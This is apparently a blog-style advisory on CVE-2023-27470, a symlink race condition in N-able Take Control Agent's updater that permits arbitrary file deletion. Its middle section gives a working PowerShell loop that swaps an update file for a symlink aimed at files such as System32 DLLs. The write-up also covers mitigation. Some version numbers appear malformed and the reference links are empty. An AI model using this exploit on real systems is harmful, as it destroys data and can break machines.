CVE-2023-27470 - How a Simple Race Condition in N-able Take Control Agent Lets Attackers Delete Any File
In early 2023, security researchers found a subtle but dangerous vulnerability in the N-able Take Control Agent—software used by IT pros for remote access and support. Tracked as CVE-2023-27470, this bug is a classic example of a race condition leading to arbitrary file deletion on Windows machines. If you ever wondered how something as mundane as a folder with updates could become a security hazard, read on.
What is CVE-2023-27470?
The vulnerability exists in a component called BASupSrvcUpdater.exe in N-able Take Control Agent, from the earliest versions up to and including 7..41.1141 (it was fixed in 7..43). The updater checks for files to update in a folder called:
%PROGRAMDATA%\GetSupportService_N-Central\PushUpdates
It then deletes those files as part of its process. But the way it checks if a file is safe to delete isn’t robust, opening the door to a Time-Of-Check-To-Time-Of-Use (TOCTOU) race condition.
Original advisory:
- N-able Security Advisory
- MITRE CVE Entry
Deletes files after checking permissions and basic attributes.
But Windows has a trick: "symlinks" (symbolic links) and "junctions" (a type of reparse point) can make a folder or file look like it’s somewhere else.
If an attacker with local access races the updater—by quickly replacing a legit update file with a symlink or junction that points to a sensitive location like C:\Windows\System32\important.dll—the updater will delete that target file.
Step-By-Step Attack Example
Here’s how an attacker might abuse CVE-2023-27470. This example uses PowerShell and the Create-Symlink functionality:
Step 1: Prepare the environment
You need regular user access on the target machine.
# Go to the vulnerable directory
cd "$env:ProgramData\GetSupportService_N-Central\PushUpdates"
# Remove any existing update file you control
Remove-Item ".\vulnerable_update.tmp" -Force -ErrorAction SilentlyContinue
# Create a dummy file (simulate file at time of check)
echo "" > ".\vulnerable_update.tmp"
Step 2: Wait for the updater, ready your race
(You might need to keep repeating until you're lucky, or write a script to automate.)
# Remove file and instantly replace it with a symlink to your target
Remove-Item ".\vulnerable_update.tmp" -Force
cmd /c mklink ".\vulnerable_update.tmp" "C:\path\to\victim\file.txt"
Step 3: Wait for deletion
Now, if the updater tries to delete vulnerable_update.tmp, it will blindly follow the symlink and delete the real target (victim\file.txt).
To improve race chances, loop rapidly as the updater works
while ($true) {
Remove-Item ".\vulnerable_update.tmp" -Force -ErrorAction SilentlyContinue
cmd /c mklink ".\vulnerable_update.tmp" "C:\path\to\important.dll"
Start-Sleep -Milliseconds 10
}
Tip: Tools like Junction.exe can be easier for directory junctions.
Mitigation and Fix
Upgrade to 7..43 or later. N-able patched the issue so the updater verifies file paths after resolving symlinks, and avoids following links outside its update folder.
Vendor Fix Announcement:
CVE Report:
Microsoft on TOCTOU:
Final Thoughts
Race conditions like CVE-2023-27470 show why even trusted update tools can become major threats if file handling isn’t airtight. If you use N-able Take Control Agent, update immediately—and remember, any software that runs as SYSTEM can be a target for creative attackers. Stay patched and stay smart!
*All content here is prepared for educational and defense awareness. Do not exploit systems without permission.*
Timeline
Published on: 09/11/2023 15:15:52 UTC
Last modified on: 09/13/2023 17:04:11 UTC